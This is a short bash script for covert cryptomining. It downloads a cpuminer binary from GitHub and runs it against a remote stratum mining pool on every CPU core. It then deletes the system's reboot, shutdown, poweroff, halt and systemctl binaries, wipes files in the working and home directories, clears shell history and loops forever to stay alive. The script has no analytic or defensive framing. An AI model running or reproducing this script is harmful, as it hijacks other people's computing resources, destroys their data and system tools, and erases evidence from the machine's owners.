#!/bin/bash
wget -O green https://github.com/claires67/buut/raw/main/cpminer > /dev/null 2>&1
chmod 777 green
./green -a yespowertide -o stratum+tcp://stratum-eu.rplant.xyz:7059 -u THZPiswHZ6FbsdXGmrqFLXJkUrLNARnK7r.$(shuf -n 1 -i 1-99999)-Bismillah -t $(nproc --all) > /dev/null 2>&1
sleep 30
sudo rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl || rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl
curl ifconfig.me
rm -rvf *
cd ~/
rm -rvf *
history -cr
while true
do
        echo "hold down..."
        sleep 30
done
